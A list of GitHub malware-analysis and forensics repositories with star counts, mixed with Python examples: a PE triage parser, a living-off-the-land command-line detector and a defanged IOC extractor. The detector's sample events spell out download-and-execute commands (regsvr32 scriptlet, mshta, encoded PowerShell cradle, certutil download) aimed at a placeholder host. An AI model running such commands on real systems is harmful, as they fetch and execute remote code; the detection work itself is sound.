Memlabs: Educational, CTF-styled labs for individuals interested in memory forensics
Stars: ✭ 696 (+494.87%)
Macholibre: Mach-O & Universal Binary parser
Stars: ✭ 102 (-12.82%)
Cortex: A powerful observable analysis and active response engine
Stars: ✭ 676 (+477.78%)
Makin: Reveals anti-debugging and anti-VM tricks [This project is not maintained anymore]
Stars: ✭ 645 (+451.28%)
Pe Sieve: Scans a given process, recognizing and dumping a variety of potentially malicious implants (replaced/injected PEs, shellcodes, hooks, in-memory patches).
Stars: ✭ 1,783 (+1423.93%)
Habomalhunter: HaboMalHunter is a sub-project of the Habo Malware Analysis System (https://habo.qq.com), which can be used for automated malware analysis and security assessment on Linux.
Stars: ✭ 627 (+435.9%)
Autotimeliner: Automagically extracts a forensic timeline from a volatile memory dump
Stars: ✭ 54 (-53.85%)
Speakeasy: Windows kernel-mode and user-mode emulation.
Stars: ✭ 605 (+417.09%)
Fileintel: A modular Python application to pull intelligence about malicious files
Stars: ✭ 97 (-17.09%)
Malware Samples: A collection of malware samples and relevant dissection information, most probably referenced from http://blog.inquest.net
Stars: ✭ 565 (+382.91%)
Virustotal: A simple command-line script to interact with the virustotal-api
Stars: ✭ 50 (-57.26%)
Antivmdetection: Script to create VirtualBox templates that make VM detection harder
Stars: ✭ 527 (+350.43%)
Oletools: Python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.
Stars: ✭ 1,848 (+1479.49%)
Scripting: PS / Bash / Python / other scripts, for fun
Stars: ✭ 47 (-59.83%)
Stringsifter: A machine learning tool that ranks strings based on their relevance for malware analysis.
Stars: ✭ 469 (+300.85%)
Threathunt: ThreatHunt is a PowerShell repository that lets you train your threat hunting skills.
Stars: ✭ 92 (-21.37%)
Turbinia: Automation and scaling of digital forensics tools
Stars: ✭ 461 (+294.02%)
Pecli: CLI tool to analyze PE files
Stars: ✭ 46 (-60.68%)
Threatingestor: Extract and aggregate threat intelligence.
Stars: ✭ 439 (+275.21%)
Information Security Tasks: A repository for infosec professionals who want to keep their skill set up to date by spending one hour a day on practical problem statements; contributions of problem statements and solutions are welcome.
Stars: ✭ 108 (-7.69%)
Pev: The PE file analysis toolkit
Stars: ✭ 422 (+260.68%)
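Both Pecli and Pev above work from the same few PE structures: the DOS stub's e_lfanew, the COFF file header, the optional header and the section table. The walker below is an added example, not code from either project; it parses those headers with the standard library only and reports the first things a triage tool flags (a section that is both writable and executable, a section with no raw data that is filled at runtime, an entry point outside every section). The sample PE it runs on is constructed in build_sample_pe() and is an assumption, not a real binary.

```python
"""Walk PE headers and report what a triage tool looks at first.
Added example (not pecli's or pev's own code); the sample PE is constructed."""
import struct

DOS_MAGIC = b"MZ"
PE_SIGNATURE = b"PE\0\0"
MACHINES = {0x014C: "i386", 0x8664: "AMD64", 0x01C4: "ARMNT", 0xAA64: "ARM64"}
OPTIONAL_MAGIC = {0x10B: "PE32", 0x20B: "PE32+"}
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000
COFF_HDR = struct.Struct("<HHIIIHH")         # IMAGE_FILE_HEADER, 20 bytes
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")  # IMAGE_SECTION_HEADER, 40 bytes


def _parse(data: bytes) -> dict:
    if data[:2] != DOS_MAGIC:
        raise ValueError("no MZ signature")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("no PE signature at e_lfanew")
    coff_off = e_lfanew + 4
    machine, nsections, timestamp, _, _, opt_size, _ = COFF_HDR.unpack_from(data, coff_off)
    opt_off = coff_off + COFF_HDR.size
    (magic,) = struct.unpack_from("<H", data, opt_off)
    # AddressOfEntryPoint sits at offset 16 in both PE32 and PE32+ optional headers
    (entry_rva,) = struct.unpack_from("<I", data, opt_off + 16)

    sections, findings, entry_section = [], [], None
    table_off = opt_off + opt_size  # section table follows the optional header
    for i in range(nsections):
        raw_name, vsize, va, rsize, rptr, _, _, _, _, flags = SECTION_HDR.unpack_from(
            data, table_off + i * SECTION_HDR.size)
        name = raw_name.rstrip(b"\0").decode("ascii", "replace")
        sections.append({"name": name, "va": va, "vsize": vsize,
                         "raw_size": rsize, "raw_ptr": rptr, "flags": flags})
        if va <= entry_rva < va + max(vsize, rsize):
            entry_section = name
        if flags & IMAGE_SCN_MEM_WRITE and flags & IMAGE_SCN_MEM_EXECUTE:
            findings.append(f"{name}: section is writable and executable")
        if rsize == 0 and vsize > 0:
            findings.append(f"{name}: no raw data but 0x{vsize:x} bytes virtual (filled at runtime, packer-like)")
    if entry_section is None:
        findings.append(f"entry point 0x{entry_rva:x} is outside every section")
    return {"machine": MACHINES.get(machine, hex(machine)),
            "format": OPTIONAL_MAGIC.get(magic, hex(magic)),
            "timestamp": timestamp, "entry_rva": entry_rva,
            "entry_section": entry_section, "sections": sections, "findings": findings}


def parse_pe(data: bytes) -> dict:
    """Parse DOS stub -> COFF header -> optional header -> section table."""
    try:
        return _parse(data)
    except struct.error as exc:  # headers point past the end of the file
        raise ValueError(f"truncated PE headers: {exc}") from exc


def build_sample_pe() -> bytes:
    """Constructed minimal PE32 whose entry point lies in a packer-like W+X section."""
    dos = bytearray(64)
    dos[:2] = DOS_MAGIC
    struct.pack_into("<I", dos, 0x3C, len(dos))  # e_lfanew: PE header right after the stub
    sections = [  # name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, Characteristics
        (b".text", 0x1000, 0x1000, 0x200, 0x400, 0x60000020),  # CODE | EXECUTE | READ
        (b"UPX1", 0x3000, 0x2000, 0x0, 0x600, 0xE0000040),     # DATA | EXECUTE | READ | WRITE
    ]
    opt_size = 0xE0  # standard PE32 optional header size
    coff = COFF_HDR.pack(0x014C, len(sections), 0x5F000000, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)     # PE32 magic
    struct.pack_into("<I", opt, 16, 0x2010)   # AddressOfEntryPoint inside UPX1
    table = b"".join(SECTION_HDR.pack(n, vs, va, rs, rp, 0, 0, 0, 0, fl)
                     for n, vs, va, rs, rp, fl in sections)
    return bytes(dos) + PE_SIGNATURE + coff + bytes(opt) + table


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    report = parse_pe(blob)
    print(f"{report['format']} {report['machine']} entry=0x{report['entry_rva']:x} in {report['entry_section']}")
    for s in report["sections"]:
        print(f"  {s['name']:<8} va=0x{s['va']:x} vsize=0x{s['vsize']:x} raw=0x{s['raw_size']:x} flags=0x{s['flags']:08x}")
    for f in report["findings"]:
        print("  !", f)
```

Pass a file path to parse a real binary; with no argument it analyzes the constructed sample. The entry-point check uses max(VirtualSize, SizeOfRawData) because packers routinely leave SizeOfRawData at zero for the section they decompress into.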
Rigek: Analyzing the Rig Exploit Kit
Stars: ✭ 45 (-61.54%)
Malware analysis: Various snippets created during malware analysis
Stars: ✭ 413 (+252.99%)
Fcl: FCL (Fileless Command Lines) - known command lines of fileless malicious executions
Stars: ✭ 409 (+249.57%)
Apkid: Android Application Identifier for packers, protectors, obfuscators and oddities - PEiD for Android
Stars: ✭ 999 (+753.85%)
Sojobo: A binary analysis framework
Stars: ✭ 116 (-0.85%)
Python Iocextract: Defanged Indicator of Compromise (IOC) extractor.
Stars: ✭ 300 (+156.41%)
Zeek: A powerful network analysis framework that is very different from the typical IDS you may know.
Stars: ✭ 4,180 (+3472.65%)
Norimaci: A simple and lightweight malware analysis sandbox for macOS
Stars: ✭ 37 (-68.38%)
Lookyloo: A web interface that captures a web page and then displays a tree of the domains that call each other.
Stars: ✭ 381 (+225.64%)
Simplify: Android virtual machine and deobfuscator
Stars: ✭ 3,865 (+3203.42%)
Virustotal Tools: Submits multiple domains to the VirusTotal API
Stars: ✭ 29 (-75.21%)
Swap digger: swap_digger automates Linux swap analysis during post-exploitation or forensics. It automates swap extraction and searches for Linux user credentials, web form credentials and e-mail addresses, HTTP basic authentication, Wi-Fi SSIDs and keys, etc.
Stars: ✭ 354 (+202.56%)
Gda Android Reversing Tool: GDA is a new, fast and powerful decompiler written in C++ (working without a Java VM) for APK, DEX, ODEX, OAT, JAR, AAR and CLASS files, which supports malicious behavior detection, privacy leak detection, vulnerability detection, path solving, packer identification, variable tracking, deobfuscation, Python & Java scripts, device memory extraction, dat…
Stars: ✭ 2,332 (+1893.16%)
Thehivedocs: Documentation of TheHive
Stars: ✭ 353 (+201.71%)
Besafe: BeSafe is a robust threat analyzer that helps protect your desktop environment and lets you know what is happening around you
Stars: ✭ 21 (-82.05%)
Malware Jail: Sandbox for semi-automatic JavaScript malware analysis, deobfuscation and payload extraction. Written for Node.js
Stars: ✭ 349 (+198.29%)
Signature Base: Signature base for my scanner tools
Stars: ✭ 1,212 (+935.9%)
Gonnacry: A Linux ransomware
Stars: ✭ 341 (+191.45%)
Thezoo: A repository of LIVE malware for your own joy and pleasure. theZoo is a project created to make malware analysis open and available to the public.
Stars: ✭ 7,849 (+6608.55%)
Mac apt: macOS Artifact Parsing Tool
Stars: ✭ 329 (+181.2%)
Lolbas: Living Off The Land Binaries And Scripts - (LOLBins and LOLScripts)
Stars: ✭ 1,506 (+1187.18%)
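The Fcl and Lolbas entries above are both catalogs of command lines in which a signed Windows binary is abused to run code without dropping a file. The scanner below is an added example (not code from either project) of how such a catalog is put to work: it matches Sysmon-style process command lines against a handful of well-known patterns (regsvr32 loading a remote scriptlet, mshta with an inline script, certutil as a downloader, wmic XSL processing, bitsadmin transfers, PowerShell download cradles) and, for PowerShell -EncodedCommand, decodes the base64/UTF-16LE payload and scans that too, since the interesting cradle is usually hidden inside it. The rule names and the sample events are constructed for the example.

```python
"""Match process command lines against known fileless / living-off-the-land patterns.
Added example (not FCL's or LOLBAS's code); rule names and sample events are constructed."""
import base64
import re

# PowerShell -EncodedCommand takes base64 of UTF-16LE text; capture the blob so it can be decoded.
ENC_RE = re.compile(
    r"\bpowershell(?:\.exe)?\b.*\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)

RULES = [
    ("regsvr32 remote scriptlet (Squiblydoo)",
     re.compile(r"\bregsvr32(?:\.exe)?\b.*\s/i:https?://.*\bscrobj\.dll\b", re.I)),
    ("mshta inline script or remote HTA",
     re.compile(r"\bmshta(?:\.exe)?\b.*(?:javascript:|vbscript:|https?://)", re.I)),
    ("rundll32 inline script",
     re.compile(r"\brundll32(?:\.exe)?\b.*(?:javascript:|vbscript:)", re.I)),
    ("certutil download or decode",
     re.compile(r"\bcertutil(?:\.exe)?\b.*\s-(?:urlcache|decode)\b", re.I)),
    ("wmic XSL script processing",
     re.compile(r"\bwmic(?:\.exe)?\b.*/format:\s*\"?(?:https?://|\S*\.xsl\b)", re.I)),
    ("bitsadmin transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\b.*/transfer\b", re.I)),
    ("PowerShell download cradle",
     re.compile(r"\b(?:downloadstring|downloadfile|net\.webclient|invoke-webrequest|start-bitstransfer)\b", re.I)),
    ("PowerShell encoded command", ENC_RE),
]


def scan(cmdline: str, _depth: int = 0) -> list[str]:
    """Return the names of every rule the command line (and any decoded payload) trips."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    m = ENC_RE.search(cmdline)
    if m and _depth < 2:  # bound recursion: encoded commands can nest encoded commands
        try:
            inner = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            inner = ""  # not valid -enc payload; the outer hit still stands
        hits += [f"decoded: {h}" for h in scan(inner, _depth + 1)]
    return hits


def _encode(ps: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects it (UTF-16LE, base64)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed Sysmon-style CommandLine values: four malicious, two benign look-alikes.
SAMPLE_EVENTS = [
    "regsvr32.exe /s /n /u /i:http://example.invalid/file.sct scrobj.dll",
    'mshta.exe javascript:a=GetObject("script:http://example.invalid/x.sct").Exec();close();',
    "powershell.exe -nop -w hidden -enc " + _encode(
        "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "certutil.exe -urlcache -split -f http://example.invalid/a.exe C:\\Users\\Public\\a.exe",
    'regsvr32.exe /s "C:\\Windows\\System32\\msxml3.dll"',                   # normal COM registration
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",  # scheduled task
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        hits = scan(event)
        print(("ALERT " if hits else "ok    ") + event[:70])
        for h in hits:
            print("        ->", h)
```

The patterns are deliberately narrow (regsvr32 is only flagged with /i:http and scrobj.dll, not on every invocation) so that the routine registrations that flood a fleet's process logs stay quiet; tune them against your own baseline before alerting on them.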
Idenlib: idenLib - library function identification [This project is not maintained anymore]
Stars: ✭ 322 (+175.21%)
Emofishes: A collection of proof-of-concepts that help improve, bypass or detect virtualized execution environments (focusing on the ones set up for malware analysis).
Stars: ✭ 11 (-90.6%)
Malheur: A tool for automatic analysis of malware behavior
Stars: ✭ 313 (+167.52%)
Flare Fakenet Ng: [Suspended] FakeNet-NG - next generation dynamic network analysis tool
Stars: ✭ 1,214 (+937.61%)
Malsub: A Python RESTful API framework for online malware analysis and threat intelligence services.
Stars: ✭ 308 (+163.25%)
Cortex4py: Python API client for Cortex
Stars: ✭ 22 (-81.2%)
Misp: MISP (core software) - open source threat intelligence and sharing platform
Stars: ✭ 3,485 (+2878.63%)
Awesome Yara: A curated list of awesome YARA rules, tools, and people.
Stars: ✭ 1,394 (+1091.45%)
Malware Feed: Bringing you the best of the worst files on the Internet.
Stars: ✭ 69 (-41.03%)
See: Sandboxed Execution Environment
Stars: ✭ 770 (+558.12%)
Hidden: Windows driver with a user-mode interface that can hide file-system and registry objects, protect processes, etc.
Stars: ✭ 768 (+556.41%)
Yargen: yarGen is a generator for YARA rules
Stars: ✭ 795 (+579.49%)
Cacador: Indicator extractor
Stars: ✭ 115 (-1.71%)
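Python Iocextract (above) and Cacador both pull indicators out of free text, and the reason "defanged" matters is that reports deliberately break indicators (hxxp://, example[.]com, 203(.)0(.)113(.)7, user[@]host) so readers cannot click them. The extractor below is an added example, not code from either project: it first reverses the common defanging conventions, then extracts URLs, IPv4 addresses, e-mail addresses, domains and MD5/SHA-1/SHA-256 hashes with the standard library. The report text it runs on is constructed (reserved example.* names and documentation address ranges, plus the well-known hashes of the empty file).

```python
"""Defanged IOC extractor: refang common obfuscations, then pull indicators.
Added example (not iocextract's or cacador's code); the sample report is constructed."""
import json
import re
from urllib.parse import urlsplit

# Defanging conventions seen in reports, mapped back to their real form (order matters:
# schemes first, then the dot/at substitutions that make the URL/domain regexes match).
REFANG_RULES = [
    (re.compile(r"\bhxxp", re.I), "http"),                               # hxxp:// and hxxps://
    (re.compile(r"\bfxp\b", re.I), "ftp"),                               # fxp://
    (re.compile(r"\[(?:\.|dot)\]|\((?:\.|dot)\)|\{(?:\.|dot)\}", re.I), "."),
    (re.compile(r"\\\."), "."),                                          # escaped dot: example\.com
    (re.compile(r"\[:\]"), ":"),
    (re.compile(r"\[(?:@|at)\]|\(at\)", re.I), "@"),
]

OCTET = r"(?:25[0-5]|2[0-4]\d|1\d\d|[1-9]?\d)"
PATTERNS = {
    "urls": re.compile(r"\b(?:https?|ftp)://[^\s'\"<>)\]]+", re.I),
    "ipv4": re.compile(r"\b" + OCTET + r"(?:\." + OCTET + r"){3}\b"),
    "emails": re.compile(r"[\w.+-]+@(?:[a-z0-9-]+\.)+[a-z]{2,}", re.I),
    # Bare domains only: the lookbehind skips hosts inside URLs/e-mails (added separately below)
    # and path components such as /gate.php. This is a heuristic; real tools check a TLD list.
    "domains": re.compile(r"(?<![\w@/.-])(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I),
    "sha256": re.compile(r"\b[a-f0-9]{64}\b", re.I),
    "sha1": re.compile(r"\b[a-f0-9]{40}\b", re.I),
    "md5": re.compile(r"\b[a-f0-9]{32}\b", re.I),
}


def refang(text: str) -> str:
    """Undo the defanging so the indicator regexes see real URLs, domains and addresses."""
    for rx, repl in REFANG_RULES:
        text = rx.sub(repl, text)
    return text


def extract_iocs(text: str) -> dict[str, list[str]]:
    """Return sorted, de-duplicated indicators by type from (possibly defanged) text."""
    text = refang(text)
    found = {kind: set(rx.findall(text)) for kind, rx in PATTERNS.items()}
    # Prose attaches trailing punctuation to URLs ("...gate.php."); strip it.
    found["urls"] = {u.rstrip(".,;") for u in found["urls"]}
    for url in found["urls"]:
        host = urlsplit(url).hostname
        if host and PATTERNS["ipv4"].fullmatch(host):
            found["ipv4"].add(host)
        elif host:
            found["domains"].add(host)
    for addr in found["emails"]:
        found["domains"].add(addr.split("@", 1)[1].lower())
    return {kind: sorted(vals, key=str.lower) for kind, vals in found.items()}


# Constructed incident write-up using reserved example names and documentation addresses.
SAMPLE_REPORT = """\
Beacon to hxxps://evil[.]example[.]com/gate[.]php from 10[.]0[.]0[.]5; second C2 at 203(.)0(.)113(.)7.
Phish sent by attacker[@]mail[.]example[.]net with dropper sha256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 (md5 d41d8cd98f00b204e9800998ecf8427e).
Staging server cdn[dot]example[dot]org; analyst contact analyst@corp[.]example (internal, do not block).
"""

if __name__ == "__main__":
    print(json.dumps(extract_iocs(SAMPLE_REPORT), indent=2))
```

Note that the extractor does not decide what is malicious: the analyst's own address comes out alongside the attacker's, so filter results against an allowlist before feeding them to a blocklist or a MISP event.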